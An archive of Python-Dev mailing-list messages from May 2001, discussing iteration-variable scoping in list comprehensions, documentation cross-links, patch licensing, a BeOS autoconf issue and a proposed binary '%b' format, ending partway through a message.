Please take a look and send comments to > doc-sig at python.org; the first page containing these changes is at: > > http://python.sourceforge.net/devel-docs/ref/identifiers.html > > The changes needed to implement the markup have not been checked in > yet, and there are some bugs in the implementation (both for HTML and > PDF), but this should make the productions easier to navigate. Let me suggest starting with http://python.sourceforge.net/devel-docs/ref/integers.html instead, and clicking on "digit" in the "hexdigit" production. The problem with the originally suggested page is that all the links point into the same paragraph, so "nothing happens" when you click one. But "digit" was the cause of a bogus bug report, as the submitter didn't realize "digit" had been defined earlier in the docs, and without something like these mondo cool new links it's almost impossible to find cross-section production definitions. Stumbled into one glitch: nonzerodigit doesn't resolve correctly; the node24.html page it refers to doesn't seem to exist. From fdrake at acm.org Wed May 30 07:53:23 2001 From: fdrake at acm.org (Fred L. Drake, Jr.) Date: Wed, 30 May 2001 01:53:23 -0400 (EDT) Subject: [Python-Dev] RE: [Doc-SIG] [development doc updates] In-Reply-To: References: <20010530053101.4985F28A10@cj42289-a.reston1.va.home.com> Message-ID: <15124.35539.53551.52668@cj42289-a.reston1.va.home.com> Tim Peters writes: > Stumbled into one glitch: nonzerodigit doesn't resolve correctly; the > node24.html page it refers to doesn't seem to exist. That was the bug alluded to. The digit* grouped with the nonzerodigit also doesn't work, although the other two uses of digit on that page (floating.html) work properly. I'll investigate tomorrow; just too tired tonight. -Fred -- Fred L. Drake, Jr. 
PythonLabs at Digital Creations

From tim.one at home.com Wed May 30 09:47:47 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 30 May 2001 03:47:47 -0400
Subject: [Python-Dev] Iteration variables and list comprehensions
In-Reply-To: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu>
Message-ID:

[David Beazley]
> ...
> However, I've also been shooting myself in the foot a little more
> than usual
> ...
> Because of this, I have frequently found myself debugging the
> following programming error:

If "frequently" is "a little more than usual", then it sounds like your problems in all areas are too common for us to really help you by fixing this one .

OK, I'm afraid the behavior follows from taking seriously the idea that listcomps are syntactic sugar for a specific pattern of nested loops and "if" tests. That was done to make it explainable, and the correspondence is indeed exact. The implementation already creates "invisible" names:

>>> [repr(name) for name in globals().keys()]
["'__builtins__'", "'__name__'", "'name'", "'__doc__'", "'_[1]'"]
>>>

Where did "_[1]" come from? You guessed it. Look for it after the listcomp finishes and it's gone:

>>> globals().keys()
['__builtins__', '__name__', 'name', '__doc__']
>>>

It's invisible because it's a temp var you *wouldn't* see in the equivalent loop nest.

> ...
> Therefore, I'm wondering if it would make any sense to make the
> iterator variables used inside of a list comprehension private in some
> manner

I'm not sure it's worth losing the exact correspondence with nested loops; or that it's not worth it either. Note that "the iterator variables" needn't be bare names:

>>> class x:
...     pass
...
>>> [1 for x.i in range(3)]
[1, 1, 1]
>>> x.i
2
>>>

This complicates explaining exactly how you want to deviate from the for-loop model. So, I think, does this:

>>> [i for i in range(2) for i in range(2, 5)]
[2, 3, 4, 2, 3, 4]
>>>

That is, even in simple cases, is the desired scope attached to the "for" or to the "[]"?
Python doesn't have a problem with reusing a name as a for target in nested loops (or in listcomps today).

> ...
> Just as an aside, I have never intentionally used the iterator
> variable of a list comprehension after the operation has completed.

Not even in a debugger, when the operation has completed via unexpected exception, and you're desperate to know what the control vrbl was bound to at the time of death? Or in an exception handler?

>>> import sys
>>> try:
...     [i*i for i in xrange(sys.maxint)]
... except OverflowError:
...     raise OverflowError("oops! blew up at %d" % i)
...
Traceback (most recent call last):
  File "<stdin>", line 4, in ?
OverflowError: oops! blew up at 46341
>>>

Or what about:

    i = 12
    def f():
        print i
        return [i for i in range(i)]
    f()

1. Should "print i" print 12, or raise UnboundLocalError?

2. Does the "i" in "range(i)" refer to the global i, or is that just senseless?

So long as the for-loop model is followed faithfully, nothing is hard to explain or predict, and simply because there's nothing truly new.

> I was actually quite surprised with this behavior the first time I saw
> it.

Me too .

> I suspect most other programmers would not anticipate this side
> effect either.

I share the suspicion, but am not sure why: "for" is a binding construct in Python, so being surprised by "for" binding a name is itself surprising.

Another principled model is possible, where

    [f(i) for i in whatever]

is treated like

    (lambda: [f(i) for i in whatever])()

>>> i = 12
>>> (lambda: [i**2 for i in range(4)])()
[0, 1, 4, 9]
>>> i
12
>>>

That's more like Haskell does it. But the day we explain a Python construct in terms of a lambda transformation is the day Guido kills all of us .

From esr at thyrsus.com Wed May 30 10:00:56 2001
From: esr at thyrsus.com (Eric S.
Raymond) Date: Wed, 30 May 2001 04:00:56 -0400 Subject: [Python-Dev] Iteration variables and list comprehensions In-Reply-To: ; from tim.one@home.com on Wed, May 30, 2001 at 03:47:47AM -0400 References: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu> Message-ID: <20010530040056.A27662@thyrsus.com> Tim Peters : > That's more like Haskell does it. But the day we explain a Python construct > in terms of a lambda transformation is the day Guido kills all of us . They'll get *my* lambdas when they pry them from my cold, dead fingers , but I find I don't have a strong opinion about how the scoping should work. -- Eric S. Raymond "Experience should teach us to be most on our guard to protect liberty when the government's purposes are beneficient... The greatest dangers to liberty lurk in insidious encroachment by men of zeal, well meaning but without understanding." -- Supreme Court Justice Louis Brandeis From thomas at xs4all.net Wed May 30 13:14:24 2001 From: thomas at xs4all.net (Thomas Wouters) Date: Wed, 30 May 2001 13:14:24 +0200 Subject: [Python-Dev] Re: [Patches] [ python-Patches-428326 ] Timer class for threading In-Reply-To: ; from noreply@sourceforge.net on Wed, May 30, 2001 at 02:16:31AM -0700 References: Message-ID: <20010530131424.Y690@xs4all.nl> On Wed, May 30, 2001 at 02:16:31AM -0700, noreply at sourceforge.net wrote: > OK, I'm un-withdrawing this patch. Just had to get things > straight with our lawyer. The patch is released under the > following license (the X11 license with 4 extra paragraphs > of disclaimers :): > http://www.zoteca.com/opensource/LICENSE.txt This raises an interesting point. Do we want separate pieces of the Python distribution to have separate licences ? I'd point out that the zoteca licence isn't mentioned on the OSI site as an Approved Licence, and that the licence contains a copyright notice, but no clear statement whether it's allowed to copy the licence other than together with the piece of software it's distributed with. 
The easiest solution would of course be for Itamar to get his boss/lawyers to give us the right to relicence it under the PSF licence :) -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From jack at oratrix.nl Wed May 30 14:26:39 2001 From: jack at oratrix.nl (Jack Jansen) Date: Wed, 30 May 2001 14:26:39 +0200 Subject: [Python-Dev] Re: [Patches] [ python-Patches-428326 ] Timer class for threading In-Reply-To: Message by Thomas Wouters , Wed, 30 May 2001 13:14:24 +0200 , <20010530131424.Y690@xs4all.nl> Message-ID: <20010530122702.F3FE53B8999@snelboot.oratrix.nl> > On Wed, May 30, 2001 at 02:16:31AM -0700, noreply at sourceforge.net wrote: > > > OK, I'm un-withdrawing this patch. Just had to get things > > straight with our lawyer. The patch is released under the > > following license (the X11 license with 4 extra paragraphs > > of disclaimers :): > > http://www.zoteca.com/opensource/LICENSE.txt > > [...] > > The easiest solution would of course be for Itamar to get his boss/lawyers > to give us the right to relicence it under the PSF licence :) I think this is the only viable solution. If various parts of Python have different license agreements this may well be a reason for people not to use Python because the hassle of figuring out which pieces fit their own licensing policy. 
-- Jack Jansen | ++++ stop the execution of Mumia Abu-Jamal ++++ Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++ www.oratrix.nl/~jack | see http://www.xs4all.nl/~tank/spg-l/sigaction.htm From beazley at cs.uchicago.edu Wed May 30 15:49:29 2001 From: beazley at cs.uchicago.edu (David Beazley) Date: Wed, 30 May 2001 08:49:29 -0500 (CDT) Subject: [Python-Dev] Iteration variables and list comprehensions In-Reply-To: References: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu> Message-ID: <15124.64105.184857.499019@gargoyle.cs.uchicago.edu> Tim Peters writes: > > Because of this, I have frequently found myself debugging the > > following programming error: > > If "frequently" is "a little more than usual", then it sounds like your > problems in all areas are too common for us to really help you by fixing > this one . I've probably been bitten by this about 5-10 times over the last few months. I can also say that it's a real bugger to track down when it happens. Now while this may just be a user problem on my part (which I can accept), I think there is a much deeper semantic problem with the current implementation of list comprehensions. Specifically, we now have this really cool list construction technique that is, for all practical purposes, an operator. Yet, at the same time, this "operator" has a really nasty side-effect of changing the values of variables in the surrounding scope in a very unnatural and unexpected way. More generally, it's essentially the same behavior that you would get if you wrote some code like this: a = expr(x,y) and expr() went off and nuked the value of x, replacing it with something completely different (note: I'm not talking about cases where x might be mutable here). Since you can write things like this a = [ 2*x for x in s] it's easy to view the right hand side as being isolated in the same way as a normal expression (where the name of the iteration variable "x" is incidental--a throwaway if you will). 
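The two readings being argued over here can be made concrete. The sketch below is illustrative only (both function names are hypothetical, not from the thread): the first function spells out a = [2*x for x in s] as the plain for-loop that Python 2.x effectively executes, so the loop variable survives in the enclosing scope; the second confines the loop variable to a throwaway scope in the spirit of Tim's lambda model. It is written to run on Python 3, whose own list comprehensions already behave like the second function.

```python
def expanded_model(s):
    """Spell out a = [2*x for x in s] as a plain for-loop, the way
    Python 2.x runs it: the target x lives in the enclosing scope."""
    x = "original"            # a value the caller might still care about
    a = []
    for x in s:               # each iteration rebinds the outer x ...
        a.append(2 * x)
    return a, x               # ... so x now holds the last element of s


def isolated_model(s):
    """Same list, but the loop variable lives in a throwaway scope,
    which is the behavior Beazley expected."""
    x = "original"
    a = (lambda: [2 * x for x in s])()   # this x is private to the lambda
    return a, x               # the outer x is untouched


print(expanded_model([1, 2, 3]))   # prints ([2, 4, 6], 3)
print(isolated_model([1, 2, 3]))   # prints ([2, 4, 6], 'original')
```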
Maybe everyone else views list comprehensions as a series of statements (the syntactic sugar for nested for-loop idea). However, if you look at how they can be used, it's completely different than this. Specifically, if I write something like this:

    a = [2*x for x in s] + [3*x for x in t]

I certainly don't conceptualize it as being literally expanded into the following sequence of statements:

    t1 = [ ]
    for x in s:
        t1.append(2*x)
    t2 = [ ]
    for x in t:
        t2.append(3*x)
    a = t1 + t2

>
> I'm not sure it's worth losing the exact correspondence with nested loops;
> or that it's not worth it either. Note that "the iterator variables"
> needn't be bare names:
>
> >>> class x:
> ...     pass
> ...
> >>> [1 for x.i in range(3)]
> [1, 1, 1]
> >>> x.i
> 2
> >>>
>

Hmmm. I didn't realize that you could even do this. Yes, this would definitely present a problem. However, if list comprehensions were modified not to assign any names in the current scope, it still seems like this would work (in this case, "x" is already defined and "x.i" is not creating a new name, but is setting an attribute on something else). Couldn't nested scopes be used to implement this in some manner?

> > ...
> > Just as an aside, I have never intentionally used the iterator
> > variable of a list comprehension after the operation has completed.
>
> Not even in a debugger, when the operation has completed via unexpected
> exception, and you're desperate to know what the control vrbl was bound to
> at the time of death? Or in an exception handler?
>

Nope. I don't make programming mistakes---well, other than this one, and well, all of those other ones :-).

> Another principled model is possible, where
>
>     [f(i) for i in whatever]
>
> is treated like
>
>     (lambda: [f(i) for i in whatever])()
>
> >>> i = 12
> >>> (lambda: [i**2 for i in range(4)])()
> [0, 1, 4, 9]
> >>> i
> 12
> >>>
>
> That's more like Haskell does it.
> But the day we explain a Python construct
> in terms of a lambda transformation is the day Guido kills all of us .

Ah yes, well this is exactly the kind of behavior that seems most natural to me. It's also the behavior that everyone expected when I went around to the various Python hackers in the department and asked them about it yesterday. I suppose I could just write this:

    a = (lambda s: [2*i for i in s])(s)

However, that's pretty ugly.

In any case, I'm mostly just curious if anyone else has been bitten by the problem I've described. I would certainly love to see a fix for it (I would even volunteer to work on a prototype implementation if there is interest). On the other hand, if no changes are deemed necessary, we should at least try to better emphasize this behavior in the documentation--perhaps encouraging people to use private names. For example:

    a = [_i*2 for _i in t]

(although, I have to say that this just looks like a gross hack--I'd rather not have to resort to doing this).

Cheers,

Dave

From fdrake at acm.org Wed May 30 16:03:13 2001 From: fdrake at acm.org (Fred L. Drake, Jr.) Date: Wed, 30 May 2001 10:03:13 -0400 (EDT) Subject: [Python-Dev] Iteration variables and list comprehensions In-Reply-To: <15124.64105.184857.499019@gargoyle.cs.uchicago.edu> References: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu> <15124.64105.184857.499019@gargoyle.cs.uchicago.edu> Message-ID: <15124.64929.215666.745913@cj42289-a.reston1.va.home.com>

David Beazley writes:
> Maybe everyone else views list comprehensions as a series of
> statements (the syntactic sugar for nested for-loop idea). However,

I certainly don't. I know that that was used as part of the design consideration, but it's not at all clear to me that this is desirable.
If I see code like this:

    x = 42
    L = [x**2 for x in range(2000)]
    print x

I think it should map to something like this from C++:

    int x = 42;
    int L[2000];
    for (int x = 0; x < 2000; ++x) {
        L[x] = x * x;
    }
    printf("%d\n", x);

i.e., both *should* print "42\n" on standard output.

Tim sez:

> I'm not sure it's worth losing the exact correspondence with nested loops;
> or that it's not worth it either. Note that "the iterator variables"
> needn't be bare names:
>
> >>> class x:
> ...     pass
> ...
> >>> [1 for x.i in range(3)]
> [1, 1, 1]
> >>> x.i
> 2

David:

> Hmmm. I didn't realize that you could even do this. Yes, this would
> definitely present a problem. However, if list comprehensions were

I didn't realize this either. I'm quite surprised by it, in fact, though I understand (I think) why it works that way. But was this intentional? It seems like pure evil to me! I'd only expect it to support bare names and sequence unpacking (with only bare names at the "edge" of all nested unpackings).

-Fred

-- Fred L. Drake, Jr. PythonLabs at Digital Creations

From gward at python.net Wed May 30 16:36:30 2001 From: gward at python.net (Greg Ward) Date: Wed, 30 May 2001 10:36:30 -0400 Subject: [Python-Dev] Iteration variables and list comprehensions In-Reply-To: <15124.64105.184857.499019@gargoyle.cs.uchicago.edu>; from beazley@cs.uchicago.edu on Wed, May 30, 2001 at 08:49:29AM -0500 References: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu> <15124.64105.184857.499019@gargoyle.cs.uchicago.edu> Message-ID: <20010530103630.B11580@gerg.ca>

On 30 May 2001, David Beazley said:
> In any case, I'm mostly just curious if anyone else has been bitten by
> the problem I've described.

For the record, I have not been bitten by this, but I probably don't use list comps as much as you do. I can completely sympathize with both your and Tim's point of view here. Both make perfect sense at the same time. Hmmm. "Do I contradict myself?
Very well then I contradict myself, (I am large, I contain multitudes)" Greg -- Greg Ward - Unix nerd gward at python.net http://starship.python.net/~gward/ Money is a powerful aphrodisiac. But flowers work almost as well. From barry at digicool.com Wed May 30 17:07:12 2001 From: barry at digicool.com (Barry A. Warsaw) Date: Wed, 30 May 2001 11:07:12 -0400 Subject: [Python-Dev] Re: [Patches] [ python-Patches-428326 ] Timer class for threading References: <20010530131424.Y690@xs4all.nl> <20010530122702.F3FE53B8999@snelboot.oratrix.nl> Message-ID: <15125.3232.925401.563151@anthem.wooz.org> >>>>> "TW" == Thomas Wouters writes: TW> The easiest solution would of course be for Itamar to get his TW> boss/lawyers to give us the right to relicence it under the TW> PSF licence :) >>>>> "JJ" == Jack Jansen writes: JJ> I think this is the only viable solution. If various parts of JJ> Python have different license agreements this may well be a JJ> reason for people not to use Python because the hassle of JJ> figuring out which pieces fit their own licensing policy. I completely agree. IMO, the most important job of the PSF is to make the Python IP sane again. That means clearing as much of the existing rights as possible, and releasing it under the NAIPL (New And Improved Python License). Any code that is licensed differently could mean that it'll be ripped out of some re-distributions. I'd be less concerned about some ancillary module that few people use, and much more concerned about some core piece of the code. -Barry From mal at lemburg.com Wed May 30 21:57:17 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Wed, 30 May 2001 21:57:17 +0200 Subject: [Python-Dev] Autoconf problems on BeOS Message-ID: <3B15509D.C790D5DF@lemburg.com> I have a bug report assigned to myself which really is more about autoconf than Unicode. The problem is that the SIZEOF_xxx tests cause the Metroworks compiler on BeOS to fail and this again causes these defines to be set to 0 ! 
Could someone with more autoconf experience please have a look ? https://sourceforge.net/tracker/?func=detail&aid=420416&group_id=5470&atid=105470 Thanks, -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/

From tim.one at home.com Wed May 30 22:07:37 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 30 May 2001 16:07:37 -0400 Subject: [Python-Dev] Iteration variables and list comprehensions In-Reply-To: <15124.64929.215666.745913@cj42289-a.reston1.va.home.com> Message-ID:

[Tim]
> Note that "the iterator variables" needn't be bare names:

[Fred]
> I didn't realize this either.

You have to get your head out of the docs and read more code .

> I'm quite surprised by it, in fact, though I understand (I think) why
> it works that way. But was this intentional?

I expect so.

> It seems like pure evil to me!

Sometimes it's the bee's knees; for example,

>>> digits = range(3)
>>> x = [None] * 3
>>> base3 = [x[:] for x[0] in digits for x[1] in digits for x[2] in digits]
>>> base3
[[0, 0, 0], [0, 0, 1], [0, 0, 2], [0, 1, 0], [0, 1, 1], [0, 1, 2], [0, 2, 0], [0, 2, 1], [0, 2, 2], [1, 0, 0], [1, 0, 1], [1, 0, 2], [1, 1, 0], [1, 1, 1], [1, 1, 2], [1, 2, 0], [1, 2, 1], [1, 2, 2], [2, 0, 0], [2, 0, 1], [2, 0, 2], [2, 1, 0], [2, 1, 1], [2, 1, 2], [2, 2, 0], [2, 2, 1], [2, 2, 2]]
>>>

I've done stuff "like that" often, albeit via the nested-loop spelling.

> I'd only expect it to support bare names and sequence unpacking (with
> only bare names at the "edge" of all nested unpackings).

It's too late to take it away now! Python always worked this way. And it's really got nothing to do with implementing what David wants (e.g., the lambda transformation I mentioned preserves its semantics) -- apart from (I hope) driving home that changes need to be considered very carefully.
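Tim's base3 trick works because subscription targets such as x[0] are legal wherever a for-loop target is. A minimal sketch of the same enumeration in the nested-loop spelling he mentions, with the function name base3_nested made up for illustration; itertools.product from the standard library is used only as an independent cross-check of the ordering:

```python
import itertools


def base3_nested():
    """Enumerate all 3-digit base-3 numbers as lists, storing each loop
    value straight into a slot of x (a subscription for-target)."""
    digits = range(3)
    x = [None] * 3
    out = []
    for x[0] in digits:
        for x[1] in digits:
            for x[2] in digits:
                out.append(x[:])   # copy: x itself keeps being mutated
    return out


base3 = base3_nested()

# The rightmost "digit" varies fastest, the same order itertools.product uses.
assert base3 == [list(p) for p in itertools.product(range(3), repeat=3)]
print(base3[:4])   # prints [[0, 0, 0], [0, 0, 1], [0, 0, 2], [0, 1, 0]]
```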
From tim.one at home.com Wed May 30 22:22:19 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 30 May 2001 16:22:19 -0400 Subject: [Python-Dev] Iteration variables and list comprehensions In-Reply-To: <15124.64105.184857.499019@gargoyle.cs.uchicago.edu> Message-ID:

[David Beazley, pretty much repeats why he doesn't like the current scheme]

I hoped it was clear the first time I was at least half sympathetic! If it wasn't, I am .

>> >>> i = 12
>> >>> (lambda: [i**2 for i in range(4)])()
>> [0, 1, 4, 9]
>> >>> i
>> 12
>> >>>
>>
>> That's more like Haskell does it.

> Ah yes, well this is exactly the kind of behavior that seems most
> natural to me. It's also the behavior that everyone expected when I
> went around to the various Python hackers in the department and asked
> them about it yesterday.

I believe that.

> I suppose I could just write this:
>
>     a = (lambda s: [2*i for i in s])(s)
>
> However, that's pretty ugly.

It's too complicated, isn't it? In the presence of nested scopes (which are reality in 2.2),

    a = (lambda: [2*i for i in s])()

does the same thing and is conceptually clearer. I'm not suggesting that you actually write that, but view it as a *model* for your intended semantics. I wouldn't want to see the implementation actually use a lambda under the covers, either, but we need some crisp way to explain the intent. Note that the lambda-trick *model* "does the right thing" for for-loop targets like x.i and x[i] too.

> In any case, I'm mostly just curious if anyone else has been bitten by
> the problem I've described. I would certainly love to see a fix for
> it (I would even volunteer to work on a prototype implementation if
> there is interest).

I encourage that, but since it's not 100% backward-compatible you'll enjoy the usual range of hysterical opposition. Needs a PEP, and possibly even an associated future-statement. Overall, I'm more in favor of changing it than not.
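Tim's claim that the lambda-trick model still does the right thing for targets like x.i and x[i] can be checked directly. In this sketch the Holder class and the lambda_model_demo function are made up for illustration: a bare-name target stays private to the lambda, while attribute and subscription targets bind no new name and so still store into objects reached through the enclosing scope. It runs on Python 3, where comprehensions already get their own scope.

```python
class Holder:
    """A bare object to hang attributes on (stands in for Tim's class x)."""
    pass


def lambda_model_demo():
    i = 12
    h = Holder()
    slots = [None]

    # Bare-name target: this i is bound only inside the lambda's own scope.
    squares = (lambda: [i * i for i in range(4)])()

    # Attribute and subscription targets create no new local name; they
    # store into h and slots, which the lambda sees via the enclosing scope.
    (lambda: [None for h.i in range(3)])()
    (lambda: [None for slots[0] in range(3)])()

    return squares, i, h.i, slots[0]


print(lambda_model_demo())   # prints ([0, 1, 4, 9], 12, 2, 2)
```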
From skip at pobox.com Wed May 30 22:48:47 2001 From: skip at pobox.com (Skip Montanaro) Date: Wed, 30 May 2001 15:48:47 -0500 Subject: [Python-Dev] scoping and list comprehensions Message-ID: <15125.23727.168431.762320@beluga.mojam.com> Regarding the issue of how list comprehensions should relate to their environment, perhaps instead of modifying list comprehensions to make them execute in new local scopes (or at least appear to) a better solution would be to allow a new local scope to be introduced inline, sort of like in C: { int i; for (i=0; i < 10; i++) { dostuffwith(i); } } While this might be used more for list comprehensions than other constructs, I'm sure people will find a way to (ab)use it for other things as well. I don't see an obvious way of adding such functionality to Python without introducing a new keyword though, which is going to make it difficult to get past Guido: l = [] scope: l = [i**2 for i in range(10)] print l Hmmm, wait a minute, what if you terminated a block introducer (if or while clause or try/except clauses) with something other than a colon? (I'm just thinking out loud, I don't think this is necessarily a good solution). if 1: # no new scope introduced l = [i**2 for i in range(10)] print l vs. if 1; # new scope introduced for enclosed block l = [i**2 for i in range(10)] print l That certainly has some line noise qualities about it, especially since colons and semicolons are visually so similar, but does offer an alternative to introducing a new keyword into the language. Hmmm, wait another minute, perhaps you could simply overload def: l = [] def: l = [i**2 for i in range(10)] print l There's also the problem of how to export results from the scope, though perhaps the new nested scope stuff provides a solution to that. (I've ignored them so far, so I can't tell...) Would it be possible for the compiler to recognize the degenerate def: and simply mangle any names that would clash instead of introducing an actual new execution frame? 
The above might be equivalent to l = [] l = [__mangled_i**2 for __mangled_i in range(10)] print l if 'i' already existed in the same scope. Just thinking out loud. I'm not sure any of these ideas is any better than the current state of affairs. Skip From Greg.Wilson at baltimore.com Wed May 30 23:11:16 2001 From: Greg.Wilson at baltimore.com (Greg Wilson) Date: Wed, 30 May 2001 17:11:16 -0400 Subject: [Python-Dev] %b format? Message-ID: <930BBCA4CEBBD411BE6500508BB3328F2E1D99@nsamcanms1.ca.baltimore.com> I would like to add a "%b" format for converting numbers to binary format (1's and 0's). I realize this isn't a C-ism, but it would be very useful for teaching purposes, as newcomers find 101101 a lot easier to understand than 0x2D. Reactions? Greg ----------------------------------------------------------------------------------------------------------------- The information contained in this message is confidential and is intended for the addressee(s) only. If you have received this message in error or there are any problems please notify the originator immediately. The unauthorized use, disclosure, copying or alteration of this message is strictly forbidden. Baltimore Technologies plc will not be liable for direct, special, indirect or consequential damages arising from alteration of the contents of this message by a third party or as a result of any virus being passed on. In addition, certain Marketing collateral may be added from time to time to promote Baltimore Technologies products, services, Global e-Security or appearance at trade shows and conferences. This footnote confirms that this email message has been swept by Baltimore MIMEsweeper for Content Security threats, including computer viruses. From esr at thyrsus.com Wed May 30 23:28:38 2001 From: esr at thyrsus.com (Eric S. Raymond) Date: Wed, 30 May 2001 17:28:38 -0400 Subject: [Python-Dev] %b format? 
In-Reply-To: <930BBCA4CEBBD411BE6500508BB3328F2E1D99@nsamcanms1.ca.baltimore.com>; from Greg.Wilson@baltimore.com on Wed, May 30, 2001 at 05:11:16PM -0400 References: <930BBCA4CEBBD411BE6500508BB3328F2E1D99@nsamcanms1.ca.baltimore.com> Message-ID: <20010530172838.A778@thyrsus.com> Greg Wilson : > I would like to add a "%b" format for converting > numbers to binary format (1's and 0's). I realize > this isn't a C-ism, but it would be very useful for > teaching purposes, as newcomers find 101101 a lot > easier to understand than 0x2D. > > Reactions? +1. Didactically pretty useful, and the additional code won't boost global complexity much. -- Eric S. Raymond Where rights secured by the Constitution are involved, there can be no rule making or legislation which would abrogate them. -- Miranda vs. Arizona, 384 US 436 p. 491 From tim.one at home.com Wed May 30 23:30:49 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 30 May 2001 17:30:49 -0400 Subject: [Python-Dev] Re: [Patches] [ python-Patches-428326 ] Timer class for threading In-Reply-To: <20010530131424.Y690@xs4all.nl> Message-ID: [Thomas Wouters] > This raises an interesting point. Do we want separate pieces of the > Python distribution to have separate licences ? This is a question for the PSF to resolve, since the PSF is intended to become the sole legal owner of Python's IP rights. My position will be that nothing ships in the distribution unless copyright has been assigned to the PSF, or the contributor has agreed to give the PSF a non-exclusive irrevocable etc license to release their work under the PSF license du jour. Fleshing out the second option so as to prevent abuse on either side is going to require significant effort ("what if the PSF goes away?", "what if the PSF changes its license to something I hate?", "what if I change my mind?", etc). Unfortunately, significant effort takes significant time too, and nobody has started on this yet. 
From mal at lemburg.com Wed May 30 23:31:06 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Wed, 30 May 2001 23:31:06 +0200 Subject: [Python-Dev] %b format? References: <930BBCA4CEBBD411BE6500508BB3328F2E1D99@nsamcanms1.ca.baltimore.com> <20010530172838.A778@thyrsus.com> Message-ID: <3B15669A.43B70A44@lemburg.com> "Eric S. Raymond" wrote: > > Greg Wilson : > > I would like to add a "%b" format for converting > > numbers to binary format (1's and 0's). I realize > > this isn't a C-ism, but it would be very useful for > > teaching purposes, as newcomers find 101101 a lot > > easier to understand than 0x2D. > > > > Reactions? > > +1. Didactically pretty useful, and the additional code won't boost > global complexity much. Good idea. The only question I have is: in which order will you print the 0s and 1s (MSB->LSB, LSB->MSB, little/big endian) ? I am thinking of adding a bit field type to mxNumber and have the same problem there... -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From esr at thyrsus.com Wed May 30 23:42:22 2001 From: esr at thyrsus.com (Eric S. Raymond) Date: Wed, 30 May 2001 17:42:22 -0400 Subject: [Python-Dev] Re: [Patches] [ python-Patches-428326 ] Timer class for threading In-Reply-To: ; from tim.one@home.com on Wed, May 30, 2001 at 05:30:49PM -0400 References: <20010530131424.Y690@xs4all.nl> Message-ID: <20010530174222.A1019@thyrsus.com> Tim Peters : > My position will be that nothing ships in the distribution unless copyright > has been assigned to the PSF, or the contributor has agreed to give the PSF > a non-exclusive irrevocable etc license to release their work under the PSF > license du jour. 
Fleshing out the second option so as to prevent abuse on > either side is going to require significant effort ("what if the PSF goes > away?", "what if the PSF changes its license to something I hate?", "what if > I change my mind?", etc). > > Unfortunately, significant effort takes significant time too, and nobody has > started on this yet. I think a PSF pledge to use only an OSI-certified license would address some of these issues. Write it into the bylaws if necessary. -- Eric S. Raymond He that would make his own liberty secure must guard even his enemy from oppression: for if he violates this duty, he establishes a precedent that will reach unto himself. -- Thomas Paine From esr at thyrsus.com Wed May 30 23:44:57 2001 From: esr at thyrsus.com (Eric S. Raymond) Date: Wed, 30 May 2001 17:44:57 -0400 Subject: [Python-Dev] %b format? In-Reply-To: <3B15669A.43B70A44@lemburg.com>; from mal@lemburg.com on Wed, May 30, 2001 at 11:31:06PM +0200 References: <930BBCA4CEBBD411BE6500508BB3328F2E1D99@nsamcanms1.ca.baltimore.com> <20010530172838.A778@thyrsus.com> <3B15669A.43B70A44@lemburg.com> Message-ID: <20010530174457.B1019@thyrsus.com> M.-A. Lemburg : > > > I would like to add a "%b" format for converting > > > numbers to binary format (1's and 0's). I realize > > > this isn't a C-ism, but it would be very useful for > > > teaching purposes, as newcomers find 101101 a lot > > > easier to understand than 0x2D. > > > > +1. Didactically pretty useful, and the additional code won't boost > > global complexity much. > > Good idea. The only question I have is: in which order will > you print the 0s and 1s (MSB->LSB, LSB->MSB, little/big endian) ? > > I am thinking of adding a bit field type to mxNumber and have > the same problem there... For *this* context, we clearly want mathematical notation; MSB to the right and no byte-swapping. After all we'd actually be printing numerals, not dumping a bitfield. -- Eric S.
Raymond The people of the various provinces are strictly forbidden to have in their possession any swords, short swords, bows, spears, firearms, or other types of arms. The possession of unnecessary implements makes difficult the collection of taxes and dues and tends to foment uprisings. -- Toyotomi Hideyoshi, dictator of Japan, August 1588 From barry at digicool.com Wed May 30 23:49:22 2001 From: barry at digicool.com (Barry A. Warsaw) Date: Wed, 30 May 2001 17:49:22 -0400 Subject: [Python-Dev] %b format? References: <930BBCA4CEBBD411BE6500508BB3328F2E1D99@nsamcanms1.ca.baltimore.com> Message-ID: <15125.27362.431144.886216@anthem.wooz.org> >>>>> "GW" == Greg Wilson writes: GW> I would like to add a "%b" format for converting numbers to GW> binary format (1's and 0's). For completeness, wouldn't you also want a binary integer literal so your students could write binary numbers in their code? And what about a binary() operator a la hex()? -Barry From tim.one at home.com Wed May 30 23:50:31 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 30 May 2001 17:50:31 -0400 Subject: [Python-Dev] %b format? In-Reply-To: <3B15669A.43B70A44@lemburg.com> Message-ID: [Greg Wilson] > I would like to add a "%b" format for converting > numbers to binary format (1's and 0's). -0, due to compound lumpiness: hex() is to %x is to __hex__ as oct() is to %o is to __oct__ as nothing is to %b is to nothing. In that respect it's unfortunate that Python has distinct nb_oct and nb_hex slots in the PyNumberMethods struct (as opposed to a single parameterized "convert to base N string" method). [MAL] > Good idea. The only question I have is: in which order will > you print the 0s and 1s (MSB->LSB, LSB->MSB, little/big endian) ? I'm sure Greg has in mind only integers, in which case %x and %o already give the only useful answer. 
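Tim's alternative, a single parameterized "convert to base N string" operation instead of separate hex and oct hooks, can be sketched as an ordinary function. The name to_base is hypothetical and this is not a proposal for the actual number-protocol slot; it accepts the same 2..36 range as int(s, base), emits the most significant digit first (the order %x and %o already use, which answers the MSB/LSB question for integers), and round-trips through int().

```python
import string

# Digit alphabet for bases 2..36, the same range int(s, base) accepts.
DIGITS = string.digits + string.ascii_lowercase


def to_base(n, base=2):
    """Render integer n in the given base, most significant digit first."""
    if not 2 <= base <= 36:
        raise ValueError("base must be in 2..36")
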